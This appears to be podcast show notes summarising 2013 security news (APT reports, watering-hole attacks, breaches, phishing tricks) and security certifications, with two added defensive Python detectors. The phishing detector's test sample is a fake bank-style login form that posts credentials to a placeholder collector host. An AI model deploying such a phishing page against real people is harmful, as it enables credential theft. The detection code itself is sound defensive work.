In this show: South Korean banks under attack, Remote Linux Wiper, Your web hosting account is getting hacked, EA's Origin game allows hackers to take control of your computer, Apple adds 2 factor authentication and much more.
In this show: US Government says that Cyber Crime is worse than Terrorism, Hacking Back, New exploit kit: Neutrino, Andromeda Botnet is back, Firefox OS, Bitcoin loses 25% because of a bug, Celebrity Credit Reports Stolen according to Equifax and TransUnion, Colin Powell's Facebook hacked and much more.
Cyberattacks are near the top of the list of the most serious threats facing the U.S., rivaling concerns about terrorism and North Korea, intelligence officials in President Barack Obama's administration said.
"Increasingly, state and non-state actors are gaining and using cyberexpertise. These capabilities put all sectors of our country at risk, from government and private networks to critical infrastructures."
Clapper raised concerns about budget cuts forced under the congressional process called sequestration.
The 7 Highly Effective Habits of a Security Awareness Program
Create a Strong Foundation
(Have) Organizational Buy-in
(Encourage) Participative Learning
(Have) More Creative Endeavors
Partner with Key Departments
Be the Department of HOW
On Hacking Back and Going Offensive Legally
Information security professionals should be the “Department of HOW” and not the “Department of NO”. We must focus on how to allow users to do what they want safely, not simply say no to our own customers and lock systems down further.
Rather than only establishing dos and don’ts in company security policies, we should raise the bar and make security a key part of solving business challenges, not an obstacle to it.
The Andromeda botnet – first spotted in late 2011 – has recently resurfaced
This threat arrives via a familiar means: spammed messages with malicious attachments or links to compromised websites hosting Blackhole Exploit Kit (BHEK) code
Andromeda itself is highly modular, and can incorporate various modules, such as:
SOCKS4 proxy module
The top affected countries of this threat are Australia, Turkey, and Germany. The perpetrators behind Andromeda have improved the malware’s propagation routines: it now proliferates by dropping several component files, one of which creates a registry key containing an encrypted .DLL file used for propagation.
we’re going to see more refinements in the tools or malware that attackers use
Although the security holes could potentially be exploited by a malicious hacker to hijack computers, no evidence has yet been seen that these vulnerabilities are being exploited in real-world attacks.
Limiting web browser plugins like Java and Flash can block “drive-by” attacks.
there is a relatively simple and effective alternative: Click-to-Play.
Click-to-Play is a feature built into Google Chrome, Mozilla Firefox and Opera (and available via add-ons in Safari).
It blocks plugin activity by default, replacing the plugin content on the page with a blank box. Users who wish to view the blocked content need only click the boxes to enable the Flash or Java content inside them.
Getting a click-to-play-like feature working in Microsoft's Internet Explorer seems to be a bit more complicated.
these approaches can be used to block Java content from running by default
A side note: if you unplug Java from any of your browsers, Oracle’s Java installer re-enables the plug-in when the program is updated.
Hackers had managed to publish the credit reports and personal information of a number of public figures on a newly-created website.
Victims include celebrities such as Beyoncé Knowles, Ashton Kutcher, Paris Hilton and Britney Spears - as well as public figures such as US Vice President Joe Biden, Hillary Clinton and Michelle Obama.
According to Bloomberg, Equifax Inc and TransUnion Corp have confirmed that sensitive, personal-identifying information about celebrities and public figures has been taken from their systems.
Microsoft noted a change in the security update policy for several applications that it built and has deployed as part of its Windows 8 operating system
Patch Tuesday, the second Tuesday of every month, is a ritual moment in which Microsoft releases a slew of updates across its product lines; Windows, Windows Server, Office, and other applications are given patches in a single push, helping IT bosses handle the update process with some order
However, with Windows 8, Microsoft delivers a number of applications through its new Windows Store
The company has decided to follow what I call the pedestrian path, by simply releasing updates as they are ready
There is an exception to this, in that if a security bug affects software that would normally be fixed during Patch Tuesday, the update will go out to both at the same time. This limits the ability for hackers to note a fix in one piece of code, and exploit the same weakness in other software.
Yahoo Mail users have been seeing their accounts broken into for months. While Yahoo says it has plugged at least two separate security holes leading to accounts getting hijacked, it appears the problem persists.
First reported to Yahoo in January 2013; the activity was still being reported in March 2013.
Attacks typically consist of Yahoo users receiving an email from a friend or colleague (and sometimes a completely unknown party) containing a link that if clicked on, results in the account being hijacked
The bit.ly URL that is included (we’re not linking it here for obvious reasons) redirects to a fake MSNBC page that reportedly hijacks your Yahoo Mail account immediately if you are logged in.
Compromised accounts are being locked out. Phone numbers are posted to a fake page where scammers are attempting to get a ransom payment in exchange for an account they have compromised.
Potential targets are not only grabbed from your contacts list but from your “Sent” and “Inbox”
On January 7, a lone hacker by the name of Shahin Ramezany uploaded a video to YouTube demonstrating how to compromise a Yahoo account by leveraging a DOM-based cross-site scripting (XSS) vulnerability exploitable in all major browsers. The same day, Yahoo got back to TNW with two statements, first saying it was investigating and secondly confirming it fixed the flaw.
On January 11, Yahoo issued a third statement to TNW: “The cross-site scripting vulnerability that we identified on Friday was fixed the same day. We can confirm that we’ve now fixed the vulnerability on all versions of the site.”
On January 28 and January 30, two Yahoo users contacted TNW to say their account was compromised via what they believed was the same way that was described in our previous articles.
On February 25, February 27, March 1, and March 4 we received more emails from Yahoo users saying their accounts had been compromised.
Yahoo reiterated its previous stance. “The XSS flaws reported to Yahoo! have been fixed and we continue to aggressively investigate reports of any email accounts exhibiting anomalous behavior,” a Yahoo spokesperson told TNW. “We’re committed to protecting our users and their data. We strongly urge our users to change their passwords frequently and to use unique, alphanumeric passwords for each online site they visit.”
They were dubbed the Comment Crew due to their use of HTML comments to hide communication to the command-and-control servers.
The initial compromise occurs through a spear phishing email sent to the target. The email contains an attachment using a theme relevant to the target. Some recent examples used by this group and blocked by Symantec technologies are listed here:
U.S. Stocks Reverse Loss as Consumer Staples, Energy Gain.zip
New contact sheet of the AN-UYQ-100 contractors.pdf
U.S. Department of Commerce Preliminarily Determines Chinese and Vietnamese Illegally Dumped Wind Towers in the United States.doc
Chinese Oil Executive Learning From Experience.doc
My Eight-year In Bank Of America.pdf
Targets include Finance, Information Technology, Aerospace, Energy, Telecommunications, Manufacturing, Transportation, Media, and Public Services
Security firm Mandiant has published an unusually detailed report documenting China-sponsored hacking intrusions that have siphoned terabytes of sensitive data from 141 organizations over the past seven years.
The latest report to lay a battery of computer intrusions at the feet of hackers linked to China's government.
Many of those claims lacked crucial details, opening them up to skeptics who complained that the lack of specificity made it difficult or impossible to conclude Chinese actors were behind attacks targeting US governmental agencies, corporations, and human rights organizations.
The Mandiant report is largely a response to these critics.
It identifies a 12-story white office tower on the outskirts of Shanghai as the nerve center for a hacking group long known to security researchers as the "Comment Crew."
The tower also happens to be the headquarters for the People's Liberation Army's Unit 61398, which was described in 2011 as the "premier entity targeting the United States and Canada, most likely focusing on political, economic, and military-related intelligence" by the Virginia-based nongovernmental organization known as the Project 2049 Institute.
Many of the claims in the Mandiant report have been independently confirmed by US intelligence officials, according to an article published by The New York Times.
According to Mandiant, Comment Crew has for years vacuumed up the proprietary secrets of more than 100 targets, including technology blueprints, manufacturing processes, clinical trial results, pricing documents, and negotiation strategies.
Of more concern, Comment Crew hackers have most recently tuned their focus to computer systems used to control dams, gasoline refineries, and other critical infrastructure.
Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent
In letters sent to customers last week, Telvent Canada Ltd. said that on Sept. 10, 2012 it learned of a breach of its internal firewall and security systems. Telvent said the attacker(s) installed malicious software and stole project files related to one of its core offerings, OASyS SCADA, a product that helps energy firms mesh older IT assets with more advanced “smart grid” technologies.
The firm said it was still investigating the incident, but that as a precautionary measure, it had disconnected the usual data links between clients and affected portions of its internal networks.
Joe Stewart, director of malware research at Dell SecureWorks and an expert on targeted attacks, said the Web site and malware names cited in the Telvent report map back to a Chinese hacking team known as the “Comment Group.”
Executive Order -- Improving Critical Infrastructure Cybersecurity
iphonedevsdk.com could still be hosting exploit attacks
The Java "zero-day" exploit allowed the attackers to install a collection of malware on the Java-enabled computers of those who visited the site
Site is still infected, do not visit
iphonedevsdk.com is an example of a "watering hole" attack.
These attacks compromise a site popular with a population of desired hacking victims, using security vulnerabilities to install code on the Web server hosting it, which injects attacks into the HTML sent to its visitors.
The exploit was the source of the attack on Twitter that led to the theft of Twitter usernames and passwords, according to a source familiar with the attack, and was used to infect computers belonging to Apple engineers.
Mobile developers who have used the forum in the last few months should check their systems for signs of malware.
A Christmas Eve cyberattack against the Web site of a regional California financial institution helped to distract bank officials from an online account takeover against one of its clients, netting thieves more than $900,000.
At approximately midday on December 24, 2012, organized cyber crooks began moving money out of corporate accounts belonging to Ascent Builders, a construction firm based in Sacramento, Calif. In short order, the company’s financial institution – San Francisco-based Bank of the West — came under a large distributed denial of service (DDoS) attack, a digital assault which disables a targeted site using a flood of junk traffic from compromised PCs.
KrebsOnSecurity contacted Ascent Builders on the morning of Dec. 26 to inform them of the theft, after interviewing one of the money mules used in the scam. Money mules are individuals who are willingly or unwittingly recruited to help the fraudsters launder stolen money and transfer the funds abroad. The mule in this case had been hired through a work-at-home job offer after posting her resume to a job search site, and said she suspected that she’d been conned into helping fraudsters.
Mark Shope, president of Ascent Builders, said that when the company’s controller originally went online on the morning of Dec. 24 to check the firm’s accounts, her browser wouldn’t let her access the bank’s page. She didn’t know it at the time, but her computer was being remotely controlled by the attackers’ malware, which blocked her from visiting the bank’s site.
The money mule was just one of 62 such individuals in the United States recruited to haul the loot stolen from Ascent. Most of the mules in this case were sent transfers of between $4,000 and $9,000, but several of them had bank accounts tied to businesses, to which the crooks wired huge transfers from Ascent’s account; five of the fraudulent transfers were for amounts ranging from $80,000 to $100,000.
Not long after putting through a batch of fraudulent automated clearing house (ACH) and wire transfers from Ascent’s accounts, the fraudsters initiated a DDoS attack against the bank’s Web site, effectively knocking it offline.
It’s not clear what tactics or botnets may have been used in the DDoS attack, but the cyberheist+DDoS approach matches the profile of cybercrime gangs using the Gameover Trojan – a ZeuS Trojan variant that has been tied to numerous DDoS attacks initiated to distract attention from high-dollar cyberheists.
Facebook officials said they recently discovered that computers belonging to several of its engineers had been hacked using a zero-day Java attack that installed a collection of previously unseen malware.
the attack did not expose customer data, and it was contained to the laptops of a small number of Facebook engineers.
The attack was discovered when a suspicious domain was detected in Facebook's Domain Name Service request logs.
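The detection described above came from a domain that stood out in DNS request logs. The following is an added example, not Facebook's code: it builds a baseline of domains resolved during an earlier window and reports domains first seen afterwards, with the clients and query counts behind them. The log format and sample lines are constructed; approximating the registrable domain as the last two labels is an assumption (use a public-suffix list in production).

```python
"""Surface never-before-seen domains in DNS request logs.

Added example for the Facebook item above, where the intrusion was noticed
from a suspicious domain in DNS request logs; this is not Facebook's code.
The log format and the sample lines are constructed. "Registrable domain" is
approximated as the last two labels, which is wrong for suffixes such as
co.uk (an assumption; use a public-suffix list in production).
"""
from collections import defaultdict
from datetime import datetime

# Constructed log: timestamp, client, query type, name. The last two days
# contain one client resolving a domain no host had ever resolved before.
SAMPLE_LOG = """\
2013-02-01T09:12:01 10.0.5.21 A www.example.com
2013-02-01T09:12:02 10.0.5.21 A cdn.example.com
2013-02-02T11:40:13 10.0.5.34 A mail.example.org
2013-02-03T08:01:00 10.0.5.21 A www.example.com
2013-02-04T23:17:45 10.0.5.21 A x7q2.update-srv.test
2013-02-04T23:18:01 10.0.5.21 A x7q2.update-srv.test
2013-02-05T10:02:10 10.0.5.34 A www.example.com
2013-02-05T10:05:55 10.0.5.34 A cdn.example.com
"""
BASELINE_END = datetime(2013, 2, 4)  # queries before this build the baseline


def registrable_domain(qname):
    """Naive registrable domain: the last two labels (assumption, see above)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line):
    ts, client, qtype, qname = line.split()
    return datetime.fromisoformat(ts), client, qtype, qname


def new_domains(log_text, baseline_end=BASELINE_END):
    """Return domains first resolved at or after baseline_end, with context."""
    records = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    baseline = set()
    seen = defaultdict(lambda: {"clients": set(), "names": set(),
                                "queries": 0, "first_seen": None})
    for ts, client, _qtype, qname in records:
        dom = registrable_domain(qname)
        if ts < baseline_end:
            baseline.add(dom)          # learn what "normal" looks like
            continue
        info = seen[dom]
        info["clients"].add(client)
        info["names"].add(qname)
        info["queries"] += 1
        info["first_seen"] = info["first_seen"] or ts
    # anything resolved after the baseline that the baseline never saw
    return {d: i for d, i in seen.items() if d not in baseline}


if __name__ == "__main__":
    for dom, info in new_domains(SAMPLE_LOG).items():
        print(dom, info["first_seen"], sorted(info["clients"]), info["queries"])
```

Low-volume, single-client, first-seen domains like the one reported here are the ones worth pulling into an investigation queue rather than alerting on outright.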
First it was do-it-yourself malware and phishing toolkits, then it was specialized sites selling stolen FTP credentials and credit card accounts, and now it's the next phase in cybercrime: crimeware as a service.
Cybercriminal organizations set up shop as service providers to other bad guys, offering them online, point-and-click criminal software as a service -- often with customer service guarantees.
With relatively less effort, they can get more money. Instead of collecting data and trying to sell it, which takes more time, they build a platform to do that, and can reach a wider audience that would like to commit these crimes.
This lets other criminals who don't want to install and update their own software or run their own malicious servers get their stolen information via a Web-based service that does the dirty work for them.
The operators of these services typically operate in small groups of five to eight people in the U.S., Netherlands, Germany, Russia, and China, he says. The servers are hosted in Asia -- in China and Malaysia.
Cyber espionage campaign against the Uyghur community, targeting MacOSX systems
Ransomware is a nasty scam that infiltrates your computer and tricks you into thinking that you’ve done something wrong.
Police ransomware in particular informs users that they need to pay their local police a fine.
The apparent arrest of this cybercriminal of Russian origin occurred in Dubai, United Arab Emirates.
The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang’s operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam.
The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia.
- Oracle today pushed out the third update in less than a month to fix critical vulnerabilities in its Java software
- What makes Java vulnerabilities so dangerous is that Java is a cross-platform product, meaning exploits against vulnerabilities in Java can be used to deliver malicious payloads to Mac and Linux systems just the same as they can Windows PCs.
- Java is a corporate product that somehow landed on something like 80 percent of consumer systems.
- This is a buggy program that seems to produce a reliable stream of zero-day exploit opportunities for malware writers. So, if you don’t need it, junk it.
- Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java
Evernote Forces Password Reset for 50M Users
http://www.h-online.com/security/news/item/Vulnerabilities-served-up-1810524.html
- Online note-syncing service Evernote is forcing all of its 50 million users to reset their passwords after detecting suspicious activity on its network.
- Evernote said digital intruders gained access to customer usernames, email addresses and encrypted passwords
- The company says it has found no evidence that any of the content that users store in Evernote was accessed, changed or lost, and that there is no indication payment information for Evernote Premium or Business customers was accessed.
- Now is a great time to review your password practices. At the top of the password no-no’s list is reusing your email password at any other site.
Fake Mandiant APT Report Used as Malware Lure
http://isc.sans.edu/diary/Fake+Mandiant+APT+Report+Used+as+Malware+Lure/15226
- Attackers are circulating malicious versions of the PDF document.
- The fake report was distributed as an email attachment named Mandiant.pdf
- According to Symantec, it targeted the CVE-2013-0641 vulnerability in Adobe Reader and Acrobat
The Security Risks of Compromised Digital Certificates
http://blog.trendmicro.com/trendlabs-security-intelligence/the-security-risks-of-compromised-digital-certificates/
- Last week, Trend Micro found malware samples that had been signed with digital certificates belonging to two software companies that develop specialized software.
- Since the two digital certificates are used by developers making very specialized products, this can increase the chances that this attack will succeed.
- Both attacks used Java exploits to get onto the affected systems
- This allows different types of malware to be launched into the memory of the infected system without actually dropping the physical malware file
- Using a valid digital certificate can trick the target system and even security software into thinking that the running program came from a legitimate source. We have reported on similar incidents involving signed malware in the past
Understanding Targeted Attacks: How do we defend ourselves
- Part of identifying the network is also having a deep understanding of it, specifically the operations, processes, events, and behavior we consider normal. Knowledge of what is truly normal and what is not will help identify anomalies better and faster.
- Defence with inside-out protection, defence in depth
- The better attitude to take is to assume that an attack is already inside the network, as this will force us to rethink the way we are currently protecting it.
http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-targeted-attacks-requires-an-integrated-solution/
- We’ve talked a lot about Advanced Persistent Threats (APT), and how such threats require a different class of protection in order to be managed effectively.
- Recent work from ISACA on the 2012 Advanced Persistent Threat (APT) Awareness Study shows 63% of security professionals said they were or could be a target for APT attacks
- Most notably, a number of organizations are still focusing resources in the wrong direction to protect against APT attacks.
- Enterprises need to understand the nature of APTs to better protect their networks against APTs
From Alarming to Familiar: Different Social Engineering Techniques
http://blog.trendmicro.com/trendlabs-security-intelligence/from-alarming-to-familiar-different-social-engineering-techniques/
- There are also other techniques that use a different, more sober approach.
- These techniques do not aim to trigger alarm, but instead try to avoid it. They try to blend into their intended victims’ normal behavior or use their interests in order to get them into schemes.
- And though these techniques are far less alarming in terms of the message they bring, they are harder to detect, and often more sinister.
- An example of this is the watering hole technique, which was used recently in an attack that ended up affecting companies such as Facebook and Apple.
Ichitaro Vulnerability: Another Zero-Day Exploit in the Wild
http://www.symantec.com/connect/blogs/ichitaro-vulnerability-another-zero-day-exploit-wild
- Symantec reports seeing this exploit since mid-January
- Specific to Japan, especially for those using the Japanese word processor software, Ichitaro.
https://blog.bit9.com/2013/02/25/bit9-security-incident-update/
- Bit9 continues to believe the attack against Bit9 was part of a larger campaign to infiltrate select US organizations in a very narrow market space
- We continue to believe the scope of the attack remained the landing point from the SQL injection attack and the virtual system containing the certificate. The surrounding systems were protected by Bit9, which limited lateral movement for the attackers
Punkspider enumerates web application vulnerabilities
- Punkspider essentially runs a vulnerability scan on random web sites.
- 75% of mobile phishing URLs were rogue versions of well-known banking or financial sites. Once users are tricked into divulging their login credentials to these sites, cybercriminals can use these stolen data to initiate unauthorized transactions and purchases via the victim’s account.
- For 2012, we found 4,000 phishing URLs designed for the mobile Web
- Then there’s the issue of users’ attitude towards mobile devices. It’s easy for users to dismiss these devices as simple devices that have no major security implications
Microsoft admits it was also hit by hackers, malware infects their Mac business unit
http://nakedsecurity.sophos.com/2013/02/23/microsoft-malware-attack/
- Microsoft published a statement on its security blog revealing that it was joining the growing list of well-known companies who had suffered at the hands of hackers.
- Microsoft says that a "small number of computers", including some in the company's Mac business unit, were infected by malware.
- The attack is similar to those which impacted the likes of Facebook and Apple, so a key part of the attack was the exploitation of a Java browser plug-in vulnerability.
http://blog.trendmicro.com/trendlabs-security-intelligence/why-is-the-watering-hole-technique-effective/
- Seen as early as 2009
- Old but new
- No lures needed
  - Compromise a site
  - Have a vulnerability to exploit
  - Develop malware
In Security Decoded this week we cover the news and there is a lot of it:
- Hacker announces the Zombie Apocalypse is here over the Emergency Broadcast System
- Facebook had a Zero Day
- Multiple US Government agencies were hacked
- Zeus is showing up in Japan
- Your heating and elevator controls could be easily hacked
- A new RAT called Frutas
- More Java, Flash, PDF and Microsoft vulnerabilities announced
- The PCI Special Interest Group releases guidance around Cloud Computing
- And much more news. And we talk in detail about security certifications.
Hacked Emergency broadcast announces Zombie Apocalypse is here
Viewers in Montana who were no doubt already on the edge of their seats waiting for the results of "teen cheaters take lie detectors" were suddenly confronted with a bigger calamity on Monday. The CW station of KRTV was interrupted by an emergency alert for a zombie apocalypse. Viewers were told that "the bodies of the dead are rising from their graves and attacking the living" in several Montana counties. KRTV confirmed someone had hacked into their emergency alert system and "there is no emergency."
Fed says internal site breached by hackers, no critical functions affected - Anonymous attack on US Government
Personal information on several hundred employees was compromised
There are indications the attackers had other motives, possibly including plans to gain future access to classified and other sensitive information.
No classified information was compromised in the cyber attack
The source or identity of the cyber attacker is not known, according to U.S. officials and outside security analysts. However, Chinese hackers are likely suspects because the department is known to be a major target of China for both secrets and technology.
The relative sophistication of the cyber attack is an indication of nation-state involvement.
A total of 14 computer servers and 20 workstations at the headquarters were penetrated during the attack.
'Cyber-attack' strikes govt again / Foreign Ministry says classified documents possibly stolen from computer
At least 20 internal documents, including confidential items, may have been stolen from the Foreign Ministry via an official computer in an apparent cyber-attack, it has been learned.
The ministry said Tuesday it had examined only one computer so far, and it would examine other computers to determine whether they were infected with malware.
The cyber-attack followed the recent revelation at the Agriculture, Forestry and Fisheries Ministry that more than 3,000 pieces of information, including highly confidential documents, are suspected to have been stolen via unauthorized access to its computers.
According to the Foreign Ministry, it was notified by the National Information Security Center (NISC) on Jan. 28 that a computer at the ministry had possibly been the victim of unauthorized access. The ministry conducted an investigation and verified one of its computers had unauthorized communications with an external server.
The documents believed stolen include conference materials that could be considered class-2 information in terms of confidentiality according to the government's standard classification.
Hackers of the Turkish Ajan group have breached Nokia Taiwan’s official website (nokia.com.tw). They defaced four subdomains and leaked files that, according to the hackers, contain around 100,000 records, including user details.
The affected subdomains are member.nokia.com.tw, event.nokia.com.tw, fun.nokia.com.tw, and swipe.nokia.com.tw.
It’s difficult to determine precisely how many users are affected by the breach. However, the Nokia610_Users file contains the names, email addresses, phone numbers, and IMEIs of 440 customers.
One of the larger files, NKA073_User, contains the details of close to 20,000 users. The names, mobile phone numbers and email addresses of over 25,000 customers are stored in another file named Event_N97_User.
An analysis of the incident revealed that an exploit had been planted on our servers possibly as early as July 25, 2012, which allowed arbitrary execution of code under the user running the MoinMoin wiki.
It is likely that the password information was downloaded from the server in the course of the security breach, so we recommend changing your passwords immediately, if you have used the same password for other services as well.
We’re going to blow up your boiler: Critical bug threatens hospital systems
file that was there was done out of process and without verification
“red team” stood up
An exploit was used on an engineer’s laptop (the maker of the undisclosed software was then made aware of the zero-day used by Facebook in their test)
Did not sound the test alarm until the team was underway
everything was a test to see how they handled a security situation
Use this quote, it is a good reference to Episode 1 in our predictions where we state CyberSecurity is falling behind and needs to close the gap: "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines."
Recently, analysts at Trend Micro completed their analysis of a new exploit kit, Whitehole
Whitehole is just a randomly selected name to help differentiate it from the Blackhole Exploit Kit
The new kit leverages existing Java vulnerabilities: 1-2011, 3-2012, and 1-2013
The new kit is currently being used in the following malware:
BKDR_Zaccess - known as bootkit malware; it has the ability to download other malware or push fake applications like FakeAV
TROJ_Ransom - known as ransomware, it typically locks systems until users are forced to pay a sum of money. This malware is rapidly active in the wild and evolving at a fast pace. We have seen this in the form of “FBI” notifications of illegal web activity.
Whitehole is still in beta testing, but the developers are currently selling the kit for 200-1800 USD
At a time when Java has come under the microscope for its multiple vulnerabilities, and companies like Apple and Mozilla urge users to update to the most current version of Java, Yahoo is still offering an application based on a 2008 version of Java
SiteBuilder is a free tool that is designed to make building a website as simple as point and click. SiteBuilder requires Java to function.
Yahoo bundles this application with Java 6 Update 7. It is not clear whether this is an oversight or whether SiteBuilder cannot function with recent versions of Java
The latest Java 6 release is Update 39
One final note about SiteBuilder: building your site with this tool may not only be hazardous to the security of your PC, it may also make it harder for your site to get the recognition it deserves. A bit of searching on this tool turned up some less than flattering results suggesting that sites built with SiteBuilder do not support an important type of Web site search optimization called “canonicalization.”
Phishers love to arouse curiosity and/or fear in the user’s mind and this stimulus can compel people to set aside all caution as well as any safety measures they might have in place
Users are advised to confirm a pending transaction with their bank and are also told that a copy of a bank slip is attached
If the HTML attachment is opened, users are shown an image of a payment order. It is interesting to note that this image is very faint and very difficult to read. Using an HTML meta tag with HTTP-EQUIV="REFRESH", the page makes this image disappear after four seconds. Displaying the receipt for a short time is an attempt to arouse enough interest in the user that they will venture further into the trap.
The page refreshes after four seconds and a popup appears stating that the user has been signed out of their email account and needs to sign in again to view the bank slip.
On clicking the only button available, users are shown a website that resembles a well-known bank login page. If users input their bank credentials or their email address on this page, their information is sent to the scammers and may be used for nefarious purposes.
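The refresh-then-login sequence above is mechanical enough to check for at the mail gateway. The following is an added example, not Symantec's code: it parses an HTML attachment and reports a meta refresh with a short delay, the remote hosts that the refresh and any form point at, and whether a password field is present, combining them into a verdict. The attachment is constructed to mirror the description (faint receipt image, four-second refresh, login form posting elsewhere) and its host names are placeholders.

```python
"""Inspect an HTML e-mail attachment for the refresh-then-login pattern.

Added example for the bank-slip phishing item above; not Symantec's code.
SAMPLE_ATTACHMENT is constructed to mirror the description; the host names
are placeholders, and the scoring thresholds are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_ATTACHMENT = """<html><head>
<meta http-equiv="refresh" content="4;url=http://signin.example.invalid/mail">
</head><body>
<img src="payment_order.png" style="opacity:0.15" alt="bank slip">
<form action="http://collector.example.invalid/login" method="post">
 <input name="email"><input name="password" type="password">
 <input type="submit" value="Sign in">
</form></body></html>"""

REFRESH_RE = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*(\S+)", re.IGNORECASE)
SHORT_DELAY = 10  # seconds; a timed swap of the page content (assumption)


class AttachmentInspector(HTMLParser):
    """Collect meta refreshes, form actions and password inputs."""

    def __init__(self):
        super().__init__()
        self.refreshes = []      # (delay in seconds, target url)
        self.form_actions = []
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m:
                self.refreshes.append((int(m.group(1)), m.group(2).strip("'\"")))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1


def remote_host(url):
    """Hostname for absolute http(s) URLs, None for relative ones."""
    parts = urlsplit(url)
    return parts.hostname if parts.scheme in ("http", "https") else None


def inspect_attachment(html):
    p = AttachmentInspector()
    p.feed(html)
    hosts = {remote_host(u) for _, u in p.refreshes}
    hosts |= {remote_host(u) for u in p.form_actions}
    hosts.discard(None)
    timed_swap = any(d <= SHORT_DELAY for d, _ in p.refreshes)
    # the lure: a timed page swap plus a credential form in a mail attachment
    verdict = "phishing-pattern" if timed_swap and p.password_fields else "no-pattern"
    return {
        "refresh_delays": [d for d, _ in p.refreshes],
        "remote_hosts": sorted(hosts),
        "password_fields": p.password_fields,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(inspect_attachment(SAMPLE_ATTACHMENT))
```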
Phishing: The Easy Way to Compromise Twitter Accounts
If the link is clicked, the browser is directed to a page that informs the user that they need to sign-in to their account to proceed. The page looks like it belongs to Twitter but it is actually a phishing page hosted on a server prepared by the attacker.
No matter what is entered into the login fields, correct or incorrect credentials, the user will appear back in their session.
Looks just like twitter
However, another fake page informs the user that the page they were attempting to visit does not exist. The page then redirects back to the legitimate Twitter page and the user is unaware of anything malicious having taken place.
in the last two years, more than eight million computers have been attacked by Bamital
Microsoft and Symantec teaming up
Microsoft convinced a judge at the U.S. District Court for the Eastern District of Virginia to give it control over the infrastructure that Bamital used to coordinate the search hijacking activities of host PCs
A webpage will be displayed to users are infected with Bamital
NetSeer suffers hack, triggers Google malware warnings
Public cloud environments are usually designed to allow access from anywhere on the Internet.
Perimeter boundaries between client environments can be fluid.
Clients may have limited or no oversight or control over cardholder data storage. Organizations might not know where cardholder data is physically stored, or the location(s) can regularly change. For redundancy or high availability reasons, data could be stored in multiple locations at any given time.
It can be challenging to verify who has access to cardholder data processed, transmitted, or stored in the cloud environment.
X10. Because X10 devices use 4-bit ID numbers, it is vulnerable to brute-force attacks. Furthermore, because it can be turned off with just one command, a thief can turn-off an X10-based alarm and infiltrate a victim’s house.
Z-Wave. By using tools readily available on the Internet, an attacker can sniff all traffic that flows in WPAN. With this information, an attacker can monitor a user’s day-to-day activities and gain information on the kind of devices used at home and how these are controlled. More tech-savvy thieves can even execute random commands via WPAN.
ZigBee. Though ZigBee-based devices have a more secured communication, problems still exist in the gateway between WPAN and an IP network. An attacker can bypass ZigBee authentication due to user’s weak password or misconﬁguration, allowing him to access devices like security cameras. With this, an attacker can monitor user’s daily activities and change gateway conﬁguration to connect to a fake Domain Name System (DNS) or proxy server, that may lead to data theft.
By stealing the keys the malware was able to take advantage of their “Application Whitelisting”
Virtually allowing all digitally signed applications to run on a customer’s network
"Due to an operational oversight within Bit9, we failed to install our own product on a handful of computers within our network,"
Keys not stored in a secure location
Certs have been revoked
There is no indication that the company’s Whitelisting products have been compromised
This parallels the 2011 RSA breach where customers were compromised through a theft of confidential data.
Original question came from Christian Fellows of Eugene AR
Basically 2 tracks: Management and Technical, Some cross over but not strong in both
Product Specific Certifications
Certified Information Systems Security Professional(CISSP)
10 domains of security
Access Control – a collection of mechanisms that work together to create security architecture to protect the assets of the information system.
Telecommunications and Network Security – discusses network structures, transmission methods, transport formats and security measures used to provide availability, integrity and confidentiality.
Network architecture and design
Information Security Governance and Risk Management – the identification of an organization’s information assets and the development, documentation and implementation of policies, standards, procedures and guidelines.
Security governance and policy
Contractual agreements and procurement processes
Risk management concepts
Security education, training and awareness
Certification and accreditation
Software Development Security – refers to the controls that are included within systems and applications software and the steps used in their development.
Systems development life cycle (SDLC)
Application environment and security controls
Effectiveness of application security
Cryptography – the principles, means and methods of disguising information to ensure its integrity, confidentiality and authenticity.
Public Key Infrastructure (PKI)
Information hiding alternatives
Security Architecture and Design – contains the concepts, principles, structures and standards used to design, implement, monitor, and secure, operating systems, equipment, networks, applications, and those controls used to enforce various levels of confidentiality, integrity and availability.
Fundamental concepts of security models
Capabilities of information systems (e.g. memory protection, virtualization)
Vulnerabilities and threats (e.g. cloud computing, aggregation, data flow control)
Operations Security – used to identify the controls over hardware, media and the operators with access privileges to any of these resources.
Attack prevention and response
Patch and vulnerability management
Business Continuity and Disaster Recovery Planning – addresses the preservation of the business in the face of major disruptions to normal business operations.
Business impact analysis
Disaster recovery process
Legal, Regulations, Investigations and Compliance – addresses computer crime laws and regulations; the investigative measures and techniques which can be used to determine if a crime has been committed and methods to gather evidence.
Physical (Environmental) Security – addresses the threats, vulnerabilities and countermeasures that can be utilized to physically protect an enterprise’s resources and sensitive information.
Site/facility design considerations
Security+ - CompTIA
Network Security (21% of exam)
Compliance and Operational Security (18%)
Threats and Vulnerabilities (21%)
Application, Data and Host Security (16%)
Access Control and Identity Management (13%)
Certified Information Security Manager (CISM) - ISACA
Information Security Governance
Information Security Steering Group
Legal and regulatory issues
Information Security Process Improvement
Recovery Time Objectives
Collecting and presenting evidence
Cost Benefit Analysis
Privacy and Tax laws
Certified Information Security Auditor (CISA) - ISACA
SACA IS Auditing Standards, Guidelines and Procedures and Code of Professional Ethics
Control objectives and controls related to IS
Procedures used to store, retrieve, transport, and dispose of confidential information assets
Control Self-Assessment (CSA)
IS auditing practices and techniques
IT governance frameworks
Quality management strategies and policies
